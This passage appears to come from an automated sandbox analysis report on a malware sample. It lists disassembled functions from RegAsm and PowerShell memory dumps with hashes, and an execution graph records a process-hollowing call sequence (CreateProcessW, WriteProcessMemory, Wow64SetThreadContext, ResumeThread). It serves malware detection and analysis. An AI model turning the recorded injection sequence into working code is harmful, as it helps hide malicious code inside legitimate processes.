                                                              Function 067F0C80 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 69f88989e3aa31984046ac376db89d88c027205424008ecde55f0d369015c22b
                                                              • Instruction ID: 178dc3516600b913776d8be5efc4bf01d193881df1247553d3d466f7bca3c61a
                                                              • Opcode Fuzzy Hash: 69f88989e3aa31984046ac376db89d88c027205424008ecde55f0d369015c22b
                                                              • Instruction Fuzzy Hash: EF01F276A00208ABDB658E65DC11FEB3B6BEB88751F188125FA25C3340DA318802DBF0
                                                              Function 067F0C90 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 246160460743b6de6d4aa553fe0c2914ccde0ebbd99803c989b3af969aadcdcb
                                                              • Instruction ID: e982e74100b4b1d2725274f3f00de2c5a0f4450171fba04b5a7cd7783f6404c6
                                                              • Opcode Fuzzy Hash: 246160460743b6de6d4aa553fe0c2914ccde0ebbd99803c989b3af969aadcdcb
                                                              • Instruction Fuzzy Hash: 3401F732B001196B9B599E659810EAF3AABEBC8651F048129F614D3340CA318801DBF0
                                                              Function 067F1480 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 50fc0c1a92740336ee4e3926712c59756511342ccec08540a886f43acd62da05
                                                              • Instruction ID: 86721c122eb85b6e9c2cf17cd9f3408f45ffa24671088dad2e9ecc575a0ab96e
                                                              • Opcode Fuzzy Hash: 50fc0c1a92740336ee4e3926712c59756511342ccec08540a886f43acd62da05
                                                              • Instruction Fuzzy Hash: CBE026308693528FC716AB20F945EB43F2BE9E110478C466294448A135DB7EC809C2A1
                                                              Function 067F3F78 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                              • Instruction ID: a917572d3e68ffac41e15ea9c36ba190c4870b7ab7f0a3bf1eb1adac1a13e82f
                                                              • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                              • Instruction Fuzzy Hash: A2C01233A2D1282EA7B4504E7C44EB3AB8CD3C12B4A214177FA5C8330098829C8001E5
                                                              Function 067F4DF3 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3802a3555f51af13acfa5e41e390a6090dc7ec9acd1012a64ab5e1c5d5a75452
                                                              • Instruction ID: 8a05d55abd802b473c04384a5f3e94dc0c5df556ca0f72d536992d1276f5a61c
                                                              • Opcode Fuzzy Hash: 3802a3555f51af13acfa5e41e390a6090dc7ec9acd1012a64ab5e1c5d5a75452
                                                              • Instruction Fuzzy Hash: 61E0ECB0C156498FCB90DFF8940559EBFF0EE46220B1086EFD569D3252E7310651CBA1
                                                              Function 067F4595 Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 541b568cf47383867b8e544393a42ca2546ad9426dbba87b4a529863c092b47a
                                                              • Instruction ID: e530a1fc9ea30f68da75c650d2891a90295b853cfa59009ba30e6e435f79e472
                                                              • Opcode Fuzzy Hash: 541b568cf47383867b8e544393a42ca2546ad9426dbba87b4a529863c092b47a
                                                              • Instruction Fuzzy Hash: 71D0673BB400189FCB049F98E8408DEFBB6FB9C221B048116F915A3261CA319921DBA0
                                                              Function 067F4E00 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4612928e4bfc932a8551097bb004f8281d500d57b9548300fde0716efbdaf30f
                                                              • Instruction ID: 2c258fe0a642513964b17371cdfa68635205c706941663f1df07b2d6527c7e30
                                                              • Opcode Fuzzy Hash: 4612928e4bfc932a8551097bb004f8281d500d57b9548300fde0716efbdaf30f
                                                              • Instruction Fuzzy Hash: DED0C9B0C1520C9FCB90EFB8A40956EBFF4EA04201F0085AAD919E3201FB3046118BE1
                                                              Function 067F1490 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72e164dab33350b86fb5759c97b68e57c8178d1de4dea654fbf86adc3c57353d
                                                              • Instruction ID: ff62ce0b3a1ba60150d044c0d8684de3047dd2efa99a001a33cef0d6807d86d2
                                                              • Opcode Fuzzy Hash: 72e164dab33350b86fb5759c97b68e57c8178d1de4dea654fbf86adc3c57353d
                                                              • Instruction Fuzzy Hash: FAC012301543094FC659EF75FA45F193B2FFAD06047908634A40A06529DF7DDC098690
                                                              Function 067F4DC8 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6652dba9ac7593e8eaba3f5bea9861f1efba7b669c2e899194ab22638287b37
                                                              • Instruction ID: e5353aee7944bfebdd9aea9685a5dc21340c09b211035cd856b4f0d069b74a92
                                                              • Opcode Fuzzy Hash: c6652dba9ac7593e8eaba3f5bea9861f1efba7b669c2e899194ab22638287b37
                                                              • Instruction Fuzzy Hash: D5D01210909BC64FDF0B67F54D241552EA56E8772130645C5C0D2CF3F6C9145908D7A6

                                                              Non-executed Functions

                                                              Function 067F2438 Relevance: 5.3, Strings: 4, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$(o]q$(o]q
                                                              • API String ID: 0-1261621458
                                                              • Opcode ID: 8fb47634c7886da7f4f36f353f2117e5e3db4d687cb1cfca8b58f4acc967861d
                                                              • Instruction ID: 5db620c84936f45fa514058080dfb5969788edb1ab5dfc6e3785594e9f6984d9
                                                              • Opcode Fuzzy Hash: 8fb47634c7886da7f4f36f353f2117e5e3db4d687cb1cfca8b58f4acc967861d
                                                              • Instruction Fuzzy Hash: 6DC14B30A102099FCB54CFA9C984EAEBBF6FF48314F148559E665AB366D730EA40CF50

                                                              Executed Functions

                                                              Function 00007FF848E837B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2655255512.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848e80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70aa00635f972a6bac396fc46e5d72351287b17824183693041b1918d6b4f3e0
                                                              • Instruction ID: 182fc30d6c7f0de26744cb28d113a2fbd0f45bd88dd56ebc921b25a38d14994d
                                                              • Opcode Fuzzy Hash: 70aa00635f972a6bac396fc46e5d72351287b17824183693041b1918d6b4f3e0
                                                              • Instruction Fuzzy Hash: 3E01677111CB0D4FDB44EF0CE451AAAB7E0FB95364F50056DE58AC3651D736E882CB45

                                                              Execution Graph

                                                              Execution Coverage:10.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:23
                                                              Total number of Limit Nodes:1
                                                              execution_graph 4177 7ff848e86238 4179 7ff848e8622b 4177->4179 4178 7ff848e86246 4179->4177 4179->4178 4180 7ff848e89e19 WriteProcessMemory 4179->4180 4181 7ff848e89eb4 4180->4181 4197 7ff848e861f8 4199 7ff848e86201 4197->4199 4198 7ff848e86246 4199->4198 4200 7ff848e89e19 WriteProcessMemory 4199->4200 4201 7ff848e89eb4 4200->4201 4161 7ff848e895a9 4162 7ff848e895b8 4161->4162 4163 7ff848e8961b CreateProcessW 4161->4163 4162->4163 4164 7ff848e896b0 4163->4164 4165 7ff848e89829 4166 7ff848e89837 Wow64SetThreadContext 4165->4166 4168 7ff848e89981 4166->4168 4173 7ff848e89f19 4174 7ff848e89f27 ResumeThread 4173->4174 4176 7ff848e89ffc 4174->4176 4169 7ff848e89d2d 4170 7ff848e89d3b WriteProcessMemory 4169->4170 4172 7ff848e89eb4 4170->4172

                                                              Executed Functions

                                                              Function 00007FF848F5177A Relevance: 3.1, Strings: 1, Instructions: 1831COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !
                                                              • API String ID: 0-2657877971
                                                              • Opcode ID: b40e873cf4efd54ddc7aae084e2bb0464fc648de8fd2beaf066c4557269b8afa
                                                              • Instruction ID: cd6febe95ef2f6e2823a5e773ca55e408fb8222518c0232a0f86b041f39ed5f3
                                                              • Opcode Fuzzy Hash: b40e873cf4efd54ddc7aae084e2bb0464fc648de8fd2beaf066c4557269b8afa
                                                              • Instruction Fuzzy Hash: 74C23732E0EB894FE79AA72858152B5BBE1EF56254F0802FBD04DC71D3DE18AC46C395
                                                              Function 00007FF848E89D2D Relevance: 1.7, APIs: 1, Instructions: 213injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 598 7ff848e89d2d-7ff848e89d39 599 7ff848e89d44-7ff848e89df1 598->599 600 7ff848e89d3b-7ff848e89d43 598->600 603 7ff848e89df3-7ff848e89e16 599->603 604 7ff848e89e19-7ff848e89eb2 WriteProcessMemory 599->604 600->599 603->604 605 7ff848e89eb4 604->605 606 7ff848e89eba-7ff848e89f16 604->606 605->606
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2600619312.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848e80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 615c4d95c66d1c2b306fd27e0b62bd112305b82545ff0dcd5a9e073e9fd13341
                                                              • Instruction ID: d2589a5fb9dcd737f016a33e83739969707fe9aa1ccc48daa96d4f77e1e8b782
                                                              • Opcode Fuzzy Hash: 615c4d95c66d1c2b306fd27e0b62bd112305b82545ff0dcd5a9e073e9fd13341
                                                              • Instruction Fuzzy Hash: 0A611270908A5C8FDB98EF58D884BE9BBF1FB69311F1041AED04DE3291DB74A985CB44
                                                              Function 00007FF848E86238 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 608 7ff848e86238-7ff848e86244 610 7ff848e8622b-7ff848e86233 608->610 611 7ff848e86246-7ff848e86256 608->611 610->608 612 7ff848e89d50-7ff848e89df1 610->612 616 7ff848e89df3-7ff848e89e16 612->616 617 7ff848e89e19-7ff848e89eb2 WriteProcessMemory 612->617 616->617 618 7ff848e89eb4 617->618 619 7ff848e89eba-7ff848e89f16 617->619 618->619
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2600619312.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848e80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ffd3edfe19af0c2093093d64a5c09b7d89c385b596fef52ec31e7f7ebd5d03c
                                                              • Instruction ID: e849a1ac65281f6328aaad454553b33b8081f04362dab8089bd89727293fbe38
                                                              • Opcode Fuzzy Hash: 6ffd3edfe19af0c2093093d64a5c09b7d89c385b596fef52ec31e7f7ebd5d03c
                                                              • Instruction Fuzzy Hash: B151F470908A5C8FDB98EF58D885BE9BBF1FB69301F1041AED04DE3251DB74A985CB44
                                                              Function 00007FF848E89829 Relevance: 1.7, APIs: 1, Instructions: 189threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 621 7ff848e89829-7ff848e89835 622 7ff848e89840-7ff848e898f4 621->622 623 7ff848e89837-7ff848e8983f 621->623 626 7ff848e89916-7ff848e8997f Wow64SetThreadContext 622->626 627 7ff848e898f6-7ff848e89913 622->627 623->622 628 7ff848e89981 626->628 629 7ff848e89987-7ff848e899d1 626->629 627->626 628->629
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2600619312.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848e80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: d9b9d3e9ae0ab03843514770b16ab5f63c657146bb9ef5ecb5fad3f96e0a4edd
                                                              • Instruction ID: 19cce001747bc288dfc28421034a3bd0c5d8ea3f4063111ebf42736d8a4e84a0
                                                              • Opcode Fuzzy Hash: d9b9d3e9ae0ab03843514770b16ab5f63c657146bb9ef5ecb5fad3f96e0a4edd
                                                              • Instruction Fuzzy Hash: 4C517D70D08A4D8FDB59EFA8C884BE9BBF1FB95311F1482AAD048D7255D7749885CF40
                                                              Function 00007FF848E895A9 Relevance: 1.7, APIs: 1, Instructions: 185processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 631 7ff848e895a9-7ff848e895b6 632 7ff848e895b8-7ff848e89619 631->632 633 7ff848e8961b-7ff848e896ae CreateProcessW 631->633 632->633 634 7ff848e896b0 633->634 635 7ff848e896b6-7ff848e897a4 call 7ff848e897a5 633->635 634->635
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2600619312.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848e80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 8645749a93392b54e413d53306456e2e7db7e4774a473d3a33dd2b422f595b21
                                                              • Instruction ID: a3604c198e18fd7d2590633ad1a4520fef8951504a54b5fdc83b873725b7c1aa
                                                              • Opcode Fuzzy Hash: 8645749a93392b54e413d53306456e2e7db7e4774a473d3a33dd2b422f595b21
                                                              • Instruction Fuzzy Hash: 9551F730908A1D8FDBA8EF18D895BE9B7F1FB59310F5041AAD40DE3291DB35AA81CF45
                                                              Function 00007FF848E89F19 Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 647 7ff848e89f19-7ff848e89f25 648 7ff848e89f30-7ff848e89ffa ResumeThread 647->648 649 7ff848e89f27-7ff848e89f2f 647->649 652 7ff848e8a002-7ff848e8a040 648->652 653 7ff848e89ffc 648->653 649->648 653->652
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2600619312.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848e80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 6177f918c19fb5766bd22e73b822c75517f06bb8c8daa40aa17d7eb328987f86
                                                              • Instruction ID: 103822c9164b3e45a87d8312f6c0a16d688758aa8cf5b664860b5bb96b5cf9dd
                                                              • Opcode Fuzzy Hash: 6177f918c19fb5766bd22e73b822c75517f06bb8c8daa40aa17d7eb328987f86
                                                              • Instruction Fuzzy Hash: A6416A70D0CA4C8FDB59DF98D885BADBBB0FF5A310F1041AED049E7252DA74A885CB41
                                                              Function 00007FF848F5052D Relevance: .5, Instructions: 545COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 700 7ff848f5052d-7ff848f50534 701 7ff848f50538-7ff848f50544 700->701 702 7ff848f50536 700->702 703 7ff848f50546 701->703 704 7ff848f50547-7ff848f50564 701->704 702->701 703->704 705 7ff848f50568-7ff848f505ad 704->705 706 7ff848f50566 704->706 708 7ff848f50721-7ff848f50790 705->708 709 7ff848f505b3-7ff848f505bd 705->709 706->705 719 7ff848f50799-7ff848f507c7 708->719 720 7ff848f50792-7ff848f50797 708->720 710 7ff848f505bf-7ff848f505d4 709->710 711 7ff848f505d6-7ff848f505e7 709->711 710->711 713 7ff848f505e9-7ff848f505ff 711->713 714 7ff848f50601-7ff848f50639 711->714 713->714 731 7ff848f5063b-7ff848f50653 714->731 732 7ff848f50655-7ff848f5066a 714->732 725 7ff848f508cc-7ff848f50935 719->725 726 7ff848f507cd-7ff848f507d7 719->726 720->719 758 7ff848f50939-7ff848f50940 725->758 759 7ff848f50937 725->759 728 7ff848f507d9-7ff848f507f1 726->728 729 7ff848f507f3-7ff848f50800 726->729 728->729 740 7ff848f5086d-7ff848f50877 729->740 741 7ff848f50802-7ff848f50805 729->741 731->732 745 7ff848f5066c-7ff848f50684 732->745 746 7ff848f50686-7ff848f506f3 732->746 743 7ff848f50879-7ff848f50885 740->743 744 7ff848f50886-7ff848f508c9 740->744 741->740 747 7ff848f50807-7ff848f5080f 741->747 744->725 745->746 784 7ff848f506fb-7ff848f5071e 746->784 747->725 751 7ff848f50815-7ff848f5081f 747->751 754 7ff848f50838-7ff848f5083c 751->754 755 7ff848f50821-7ff848f50831 751->755 754->740 760 7ff848f5083e-7ff848f50866 754->760 755->754 763 7ff848f50867-7ff848f5086c 755->763 764 7ff848f50941-7ff848f5095d 758->764 759->758 760->763 775 7ff848f5095f 764->775 776 7ff848f50960-7ff848f50971 764->776 775->776 777 7ff848f50974-7ff848f50984 776->777 778 7ff848f50973 776->778 780 7ff848f50988-7ff848f5098c 777->780 781 7ff848f50986 777->781 778->777 782 7ff848f5098e 780->782 783 7ff848f50990 780->783 781->780 782->783 783->764 785 7ff848f50992-7ff848f509a8 783->785 784->708
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22ce1f0f70b34327a9555bf80e9892224968463debe9e6c662a11f446c5a73f1
                                                              • Instruction ID: 09172f25e62c4ab15118356abdc70858f21e60a249805986f2519ec135d33bc5
                                                              • Opcode Fuzzy Hash: 22ce1f0f70b34327a9555bf80e9892224968463debe9e6c662a11f446c5a73f1
                                                              • Instruction Fuzzy Hash: E8F13331A0EBC54FE75ABB285855571BBE1EF96350F1801FFE448C71D3EA18A806C396
                                                              Function 00007FF848F514AE Relevance: .2, Instructions: 222COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1fb5b8d906eb35c71cf16e973ed0cba60bff609ee1e9a2d71f88c1125524298
                                                              • Instruction ID: bf9488bac79f7b40b1d853236dbb5839b3c3889bb6adb5acd66e2324f6aeca12
                                                              • Opcode Fuzzy Hash: d1fb5b8d906eb35c71cf16e973ed0cba60bff609ee1e9a2d71f88c1125524298
                                                              • Instruction Fuzzy Hash: 04611632E1EE864FF79AA72C14512B9E6D1EF456A8F5801BAD00EC71D3EF18BC448359
                                                              Function 00007FF848F50FFE Relevance: .2, Instructions: 195COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e63f4f3dc643ac245ffa85cb2c9bbf5a152489fa020a1cbbf8e058ef2963613d
                                                              • Instruction ID: 2fa51fe1827e32f11c7408b4a93a24752711cf7c0d677efd9861d625ef5d18e1
                                                              • Opcode Fuzzy Hash: e63f4f3dc643ac245ffa85cb2c9bbf5a152489fa020a1cbbf8e058ef2963613d
                                                              • Instruction Fuzzy Hash: 5051F632E1EE864FF7A9A72C14516B9A6D1FF45794F5801BAC01EC71D3DE08BC448399
                                                              Function 00007FF848F51A28 Relevance: .2, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0c730288c7c91bd0a24ab16720f83e77e91069375eeeb6cc02c71749d4c978a4
                                                              • Instruction ID: 6956bb5ab1cc923cd6288d16ffffab7577cc2847e2bb913c608c932dbaa14920
                                                              • Opcode Fuzzy Hash: 0c730288c7c91bd0a24ab16720f83e77e91069375eeeb6cc02c71749d4c978a4
                                                              • Instruction Fuzzy Hash: 1F41F532D1EB8A0FE767673808281B5BBE5DF52798F0901BAD44CC71D3EA186C4A8359
                                                              Function 00007FF848F514FA Relevance: .1, Instructions: 140COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1132 7ff848f514fa-7ff848f51506 1134 7ff848f5150c-7ff848f51543 1132->1134 1135 7ff848f51644-7ff848f5164e 1132->1135 1145 7ff848f51545-7ff848f51565 1134->1145 1146 7ff848f51567 1134->1146 1136 7ff848f5165d-7ff848f516a0 1135->1136 1137 7ff848f51650-7ff848f5165c 1135->1137 1147 7ff848f51569-7ff848f5156b 1145->1147 1146->1147 1147->1135 1149 7ff848f51571-7ff848f51574 1147->1149 1151 7ff848f5158b 1149->1151 1152 7ff848f51576-7ff848f51589 1149->1152 1154 7ff848f5158d-7ff848f5158f 1151->1154 1152->1154 1154->1135 1155 7ff848f51595-7ff848f515cf 1154->1155 1160 7ff848f515e8-7ff848f515ee 1155->1160 1161 7ff848f515d1-7ff848f515de 1155->1161 1163 7ff848f5160a-7ff848f5160d 1160->1163 1164 7ff848f515f0-7ff848f51608 1160->1164 1161->1160 1165 7ff848f515e0-7ff848f515e6 1161->1165 1167 7ff848f51614-7ff848f5161d 1163->1167 1164->1163 1165->1160 1170 7ff848f5161f-7ff848f51634 1167->1170 1171 7ff848f51636-7ff848f51643 1167->1171 1170->1171
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1be55629a068b64017624602cd3c4a8c68f55a5d031d86c1ff0784ba4b7d0f2d
                                                              • Instruction ID: 8085a6154ec5eb0a506d923196eb6e98149cac560298fa113f4d9d27ad282481
                                                              • Opcode Fuzzy Hash: 1be55629a068b64017624602cd3c4a8c68f55a5d031d86c1ff0784ba4b7d0f2d
                                                              • Instruction Fuzzy Hash: DB41E632E1EE875FF39AB72C045527595D1EF512A8F9801BAD41EC31D3EF1CAC844209
                                                              Function 00007FF848F5104A Relevance: .1, Instructions: 115COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1174 7ff848f5104a-7ff848f51056 1176 7ff848f5105c-7ff848f51093 1174->1176 1177 7ff848f5115a-7ff848f51164 1174->1177 1187 7ff848f51095-7ff848f510b5 1176->1187 1188 7ff848f510b7 1176->1188 1178 7ff848f51166-7ff848f51172 1177->1178 1179 7ff848f51173-7ff848f511b6 1177->1179 1189 7ff848f510b9-7ff848f510bb 1187->1189 1188->1189 1189->1177 1191 7ff848f510c1-7ff848f510c4 1189->1191 1191->1177 1193 7ff848f510ca-7ff848f51104 1191->1193 1198 7ff848f51106-7ff848f5111e 1193->1198 1199 7ff848f51120-7ff848f51123 1193->1199 1198->1199 1201 7ff848f5112a-7ff848f51133 1199->1201 1203 7ff848f5114c-7ff848f51159 1201->1203 1204 7ff848f51135-7ff848f51142 1201->1204 1204->1203 1206 7ff848f51144-7ff848f5114a 1204->1206 1206->1203
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01f457d3602ea3ef58b4094738958aca710cdff3aa8a81117397699de045a8e3
                                                              • Instruction ID: c3e0d783f8caa9e927c475e86f10bed669788a2bca89629f28f1af26b5b7cda8
                                                              • Opcode Fuzzy Hash: 01f457d3602ea3ef58b4094738958aca710cdff3aa8a81117397699de045a8e3
                                                              • Instruction Fuzzy Hash: B631CE32E1EE864FF7A9772C14652B8A5D1FF416A9F5801BAD419C31D3DE0CAC844319

                                                              Executed Functions

                                                              Function 00007FF848F62A25 Relevance: .4, Instructions: 434COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
